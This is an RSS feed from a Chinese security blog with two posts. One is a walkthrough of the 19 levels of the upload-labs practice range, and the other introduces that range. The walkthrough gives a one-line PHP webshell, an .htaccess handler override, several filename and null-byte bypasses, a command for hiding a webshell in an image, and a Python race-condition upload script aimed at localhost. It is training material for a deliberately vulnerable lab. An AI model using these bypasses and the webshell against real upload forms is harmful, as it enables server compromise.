<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>突破 &#8211; ChaBug安全</title>
	<atom:link href="/tags/%E7%AA%81%E7%A0%B4/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Thu, 26 Jul 2018 03:17:44 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>upload-labs-writeup：upload-labs 上传漏洞靶场的解题方法</title>
		<link>/web/470.html</link>
					<comments>/web/470.html#comments</comments>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Tue, 24 Jul 2018 06:44:40 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[upload]]></category>
		<category><![CDATA[Writeup]]></category>
		<category><![CDATA[上传]]></category>
		<category><![CDATA[突破]]></category>
		<category><![CDATA[笔记]]></category>
		<guid isPermaLink="false">/?p=470</guid>

					<description><![CDATA[0x00：前言 本篇文章主要记录绕过一个基于php语言的上传漏洞的靶场项目upload-labs (最新commit17ec936) 的19个上传关卡的方法。 文章适合有一定上传绕...]]></description>
										<content:encoded><![CDATA[<h3>0x00：前言</h3>
<p>本篇文章主要记录绕过一个基于php语言的<span class="wpcom_tag_link"><a href="/tags/%e4%b8%8a%e4%bc%a0" title="上传" target="_blank">上传</a></span>漏洞的靶场项目<a href="https://github.com/c0ny1/upload-labs">upload-labs</a> (最新commit<a href="https://github.com/c0ny1/upload-labs/commit/17ec93650d05d956e5868518cd6e8e36085ab2a3">17ec936</a>) 的19个上传关卡的方法。</p>
<p>文章适合有一定上传绕过知识基础的读者阅读，绕过原理请参考其它文章和项目源码，限于篇幅文章中不展开解释。</p>
<h3><a id="user-content-0x01测试配置" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#0x01%E6%B5%8B%E8%AF%95%E9%85%8D%E7%BD%AE" aria-hidden="true"></a>0x01：测试配置</h3>
<p>可直接下载作者的配置好的PHPStudy<a href="https://github.com/c0ny1/upload-labs/releases">靶场运行环境</a>，节省时间。</p>
<table>
<thead>
<tr>
<th align="left">浏览器</th>
<th align="left">Firefox</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><strong>插件</strong></td>
<td align="left">NoScript</td>
</tr>
<tr>
<td align="left"><strong>插件</strong></td>
<td align="left">HackBar</td>
</tr>
<tr>
<td align="left"><strong>抓包工具</strong></td>
<td align="left">Burpsuite Pro</td>
</tr>
<tr>
<td align="left"><strong>Webshell代码</strong></td>
<td align="left"><code>&lt;?php assert($_POST["LandGrey"])?&gt;</code></td>
</tr>
</tbody>
</table>
<h3><a id="user-content-0x02绕过方法" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#0x02%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95" aria-hidden="true"></a>0x02：绕过方法</h3>
<h4><a id="user-content-pass-01" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-01" aria-hidden="true"></a>Pass-01</h4>
<p>前端禁用JS，直接上传Webshell</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/01-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/01-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-02" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-02" aria-hidden="true"></a>Pass-02</h4>
<p>截断上传数据包，修改Content-Type为<code>image/gif</code>，然后放行数据包</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/02-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/02-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-03" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-03" aria-hidden="true"></a>Pass-03</h4>
<p>重写文件解析规则绕过。上传先上传一个名为<code>.htaccess</code>文件，内容如下：</p>
<pre><code>&lt;FilesMatch "03.jpg"&gt;
SetHandler application/x-httpd-php
&lt;/FilesMatch&gt;
</code></pre>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/03-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/03-1.png" alt="" /></a></p>
<p>然后再上传一个<code>03.jpg</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/03-2.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/03-2.png" alt="" /></a></p>
<p>执行上传的<code>03.jpg</code>脚本</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/03-3.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/03-3.png" alt="" /></a></p>
<h4><a id="user-content-pass-04" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-04" aria-hidden="true"></a>Pass-04</h4>
<p>利用PHP 和 Windows环境的叠加特性，以下符号在正则匹配时的相等性：</p>
<pre><code>双引号"     =   点号.
大于符号&gt;   =   问号?
小于符号&lt;   =   星号*
</code></pre>
<p>先上传一个名为<code>4.php:.jpg</code>的文件，上传成功后会生成<code>4.php</code>的空文件，大小为0KB.</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/04-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/04-1.png" alt="" /></a></p>
<p>然后将文件名改为<code>4.&lt;</code>或<code>4.&lt;&lt;&lt;</code>或<code>4.&gt;&gt;&gt;</code>或<code>4.&gt;&gt;&lt;</code>后再次上传，重写<code>4.php</code>文件内容，Webshell代码就会写入原来的<code>4.php</code>空文件中。</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/04-2.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/04-2.png" alt="" /></a></p>
<h4><a id="user-content-pass-05" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-05" aria-hidden="true"></a>Pass-05</h4>
<p>文件名后缀大小写混合绕过。<code>05.php</code>改成<code>05.phP</code>然后上传</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/05-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/05-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-06" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-06" aria-hidden="true"></a>Pass-06</h4>
<p>利用Windows系统的文件名特性。文件名最后增加<strong>点和空格</strong>，写成<code>06.php.</code>，上传后保存在Windows系统上的文件名最后的一个<code>.</code>会被去掉，实际上保存的文件名就是<code>06.php</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/06-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/06-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-07" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-07" aria-hidden="true"></a>Pass-07</h4>
<p>原理同<strong>Pass-06</strong>，文件名后加点，改成<code>07.php.</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/07-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/07-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-08" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-08" aria-hidden="true"></a>Pass-08</h4>
<p>Windows文件流特性绕过，文件名改成<code>08.php::$DATA</code>，上传成功后保存的文件名其实是<code>08.php</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/08-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/08-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-09" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-09" aria-hidden="true"></a>Pass-09</h4>
<p><strong>原理同Pass-06</strong>，上传文件名后加上<strong>点+空格+点</strong>，改为<code>09.php. .</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/09-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/09-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-10" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-10" aria-hidden="true"></a>Pass-10</h4>
<p>双写文件名绕过，文件名改成<code>10.pphphp</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/10-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/10-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-11" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-11" aria-hidden="true"></a>Pass-11</h4>
<p>上传路径名%00截断绕过。上传的文件名写成<code>11.jpg</code>, save_path改成<code>../<span class="wpcom_tag_link"><a href="/tags/upload" title="upload" target="_blank">upload</a></span>/11.php%00</code>，最后保存下来的文件就是<code>11.php</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/11-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/11-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-12" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-12" aria-hidden="true"></a>Pass-12</h4>
<p>php.ini设置 <code>magic_quotes_gpc = Off</code></p>
<p>原理同<strong>Pass-11</strong>，上传路径0x00绕过。利用Burpsuite的Hex功能将save_path改成<code>../upload/12.php【二进制00】</code>形式</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/12-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/12-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-13" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-13" aria-hidden="true"></a>Pass-13</h4>
<p>绕过文件头检查，添加GIF图片的文件头<code>GIF89a</code>，绕过GIF图片检查。</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/13-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/13-1.png" alt="" /></a></p>
<p>使用命令<code>copy normal.jpg /b + shell.php /a webshell.jpg</code>，将php一句话追加到jpg图片末尾，代码不全的话，人工补充完整。形成一个包含Webshell代码的新jpg图片，然后直接上传即可。<a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/webshell/webshell.jpg">JPG一句话shell参考示例</a></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/13-2.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/13-2.png" alt="" /></a></p>
<p>png图片处理方式同上。<a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/webshell/webshell.png">PNG一句话shell参考示例</a></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/13-3.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/13-3.png" alt="" /></a></p>
<h4><a id="user-content-pass-14" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-14" aria-hidden="true"></a>Pass-14</h4>
<p>原理和示例同<strong>Pass-13</strong>，添加GIF图片的文件头绕过检查</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/14-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/14-1.png" alt="" /></a></p>
<p>png图片webshell上传同<strong>Pass-13</strong>。</p>
<p>jpg/jpeg图片webshell上传存在问题，正常的图片也上传不了，等待作者调整。</p>
<h4><a id="user-content-pass-15" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-15" aria-hidden="true"></a>Pass-15</h4>
<p>原理同<strong>Pass-13</strong>，添加GIF图片的文件头绕过检查</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/15-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/15-1.png" alt="" /></a></p>
<p>png图片webshell上传同<strong>Pass-13</strong>。</p>
<p>jpg/jpeg图片webshell上传同<strong>Pass-13</strong>。</p>
<h4><a id="user-content-pass-16" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-16" aria-hidden="true"></a>Pass-16</h4>
<p>原理：将一个正常显示的图片，上传到服务器。寻找图片被渲染后与原始图片部分对比仍然相同的数据块部分，将Webshell代码插在该部分，然后上传。具体实现需要自己编写Python程序，人工尝试基本是不可能构造出能绕过渲染函数的图片webshell的。</p>
<p>这里提供一个包含一句话webshell代码并可以绕过PHP的imagecreatefromgif函数的GIF图片<a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/webshell/bypass-imagecreatefromgif-pass-00.gif">示例</a>。</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/16-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/16-1.png" alt="" /></a></p>
<p>打开被渲染后的图片，Webshell代码仍然存在</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/16-2.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/16-2.png" alt="" /></a></p>
<p>提供一个jpg格式图片绕过imagecreatefromjpeg函数渲染的一个<a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/webshell/bypass-imagecreatefromjpeg-pass-LandGrey.jpg">示例文件</a>。 直接上传示例文件会触发Warning警告，并提示文件不是jpg格式的图片。但是实际上已经上传成功，而且示例文件名没有改变。</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/16-3.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/16-3.png" alt="" /></a></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/16-4.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/16-4.png" alt="" /></a></p>
<p>从上面上传jpg图片可以看到我们想复杂了，程序没有对渲染异常进行处理，直接在正常png图片内插入webshell代码，然后上传<a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/webshell/bypass-imagecreatefrompng-pass-LandGrey.png">示例文件</a>即可，并不需要图片是正常的图片。</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/16-5.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/16-5.png" alt="" /></a></p>
<p>程序依然没有对文件重命名，携带webshell的无效损坏png图片直接被上传成功。</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/16-6.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/16-6.png" alt="" /></a></p>
<h4><a id="user-content-pass-17" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-17" aria-hidden="true"></a>Pass-17</h4>
<p>利用条件竞争删除文件时间差绕过。使用命令<code>pip install hackhttp</code>安装<a href="https://github.com/BugScanTeam/hackhttp">hackhttp</a>模块，运行下面的Python代码即可。如果还是删除太快，可以适当调整线程并发数。</p>
<pre class="lang:default decode:true " >#!/usr/bin/env python
# coding:utf-8
# Build By LandGrey

import hackhttp
from multiprocessing.dummy import Pool as ThreadPool


def upload(lists):
    hh = hackhttp.hackhttp()
    raw = """POST /upload-labs/Pass-17/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/upload-labs/Pass-17/index.php
Cookie: pass=17
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------6696274297634
Content-Length: 341

-----------------------------6696274297634
Content-Disposition: form-data; name="upload_file"; filename="17.php"
Content-Type: application/octet-stream

&lt;?php assert($_POST["LandGrey"])?&gt;
-----------------------------6696274297634
Content-Disposition: form-data; name="submit"

上传
-----------------------------6696274297634--
"""
    code, head, html, redirect, log = hh.http('http://127.0.0.1/upload-labs/Pass-17/index.php', raw=raw)
    print(str(code) + "\r")


pool = ThreadPool(10)
pool.map(upload, range(10000))
pool.close()
pool.join()</pre>
<p>在脚本运行的时候，访问Webshell</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/17-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/17-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-18" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-18" aria-hidden="true"></a>Pass-18</h4>
<p>刚开始没有找到绕过方法，最后下载作者Github提供的打包环境，利用上传重命名竞争+Apache解析漏洞，成功绕过。</p>
<p>上传名字为<code>18.php.7Z</code>的文件，快速重复提交该数据包，会提示文件已经被上传，但没有被重命名。</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/18-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/18-1.png" alt="" /></a></p>
<p>快速提交上面的数据包，可以让文件名字不被重命名上传成功。</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/18-2.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/18-2.png" alt="" /></a></p>
<p>然后利用Apache的解析漏洞，即可获得shell</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/18-3.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/18-3.png" alt="" /></a></p>
<h4><a id="user-content-pass-19" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-19" aria-hidden="true"></a>Pass-19</h4>
<p>原理同<strong>Pass-11</strong>，上传的文件名用0x00绕过。改成<code>19.php【二进制00】.1.jpg</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/19-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/19-1.png" alt="" /></a></p>
<h3><a id="user-content-0x03后记" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#0x03%E5%90%8E%E8%AE%B0" aria-hidden="true"></a>0x03：后记</h3>
<p>可以发现以上绕过方法中有些是重复的，有些是意外情况，可能与项目作者的本意不符，故本文仅作为参考使用。</p>
<p>等作者修复代码逻辑后，本文也会适时更新。</p>
]]></content:encoded>
					
					<wfw:commentRss>/web/470.html/feed</wfw:commentRss>
			<slash:comments>5</slash:comments>
		
		
			</item>
		<item>
		<title>upload-labs：一个帮你总结所有类型的上传漏洞的靶场</title>
		<link>/tools/469.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Tue, 24 Jul 2018 06:39:20 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[上传]]></category>
		<category><![CDATA[突破]]></category>
		<category><![CDATA[靶场]]></category>
		<guid isPermaLink="false">/?p=469</guid>

					<description><![CDATA[upload-labs 一个帮你总结所有类型的上传漏洞的靶场 运行环境 操作系统：推荐windows（除了Pass-19必须在linux下，其余Pass都可以在windows上运行...]]></description>
										<content:encoded><![CDATA[<h1>upload-labs</h1>
<p>一个帮你总结所有类型的<span class="wpcom_tag_link"><a href="/tags/%e4%b8%8a%e4%bc%a0" title="上传" target="_blank">上传</a></span>漏洞的<span class="wpcom_tag_link"><a href="/tags/%e9%9d%b6%e5%9c%ba" title="靶场" target="_blank">靶场</a></span></p>
<p><a href="https://github.com/c0ny1/upload-labs/blob/master/doc/mind-map.png" target="_blank" rel="noopener"><img src="https://github.com/c0ny1/upload-labs/raw/master/doc/mind-map.png" alt="" /></a></p>
<h2><a id="user-content-运行环境" class="anchor" href="https://github.com/c0ny1/upload-labs#%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83" aria-hidden="true"></a>运行环境</h2>
<pre><code>操作系统：推荐windows（除了Pass-19必须在linux下，其余Pass都可以在windows上运行）
php版本：推荐5.2.17(其他版本可能会导致部分Pass无法突破)
php组件：php_gd2,php_exif（部分Pass需要开启这两个组件）
apache：以moudel方式连接
</code></pre>
<p>PS：为了节省时间，可下载<a href="https://github.com/c0ny1/upload-labs/releases">Windows下集成环境</a>，解压即可运行靶机环境。</p>
<h2><a id="user-content-使用" class="anchor" href="https://github.com/c0ny1/upload-labs#%E4%BD%BF%E7%94%A8" aria-hidden="true"></a>使用</h2>
<p>1.主界面</p>
<p><a href="https://github.com/c0ny1/upload-labs/blob/master/doc/index.jpg" target="_blank" rel="noopener"><img src="https://github.com/c0ny1/upload-labs/raw/master/doc/index.jpg" alt="主界面" /></a></p>
<p>2.每一关</p>
<p><a href="https://github.com/c0ny1/upload-labs/blob/master/doc/pass.jpg" target="_blank" rel="noopener"><img src="https://github.com/c0ny1/upload-labs/raw/master/doc/pass.jpg" alt="每一关" /></a></p>
<p>3.查看代码</p>
<p><a href="https://github.com/c0ny1/upload-labs/blob/master/doc/code.jpg" target="_blank" rel="noopener"><img src="https://github.com/c0ny1/upload-labs/raw/master/doc/code.jpg" alt="代码" /></a></p>
<h2><a id="user-content-总结" class="anchor" href="https://github.com/c0ny1/upload-labs#%E6%80%BB%E7%BB%93" aria-hidden="true"></a>总结</h2>
<p><a href="https://github.com/c0ny1/upload-labs/blob/master/doc/sum_up.png" target="_blank" rel="noopener"><img src="https://github.com/c0ny1/upload-labs/raw/master/doc/sum_up.png" alt="判断上传漏洞类型" /></a></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
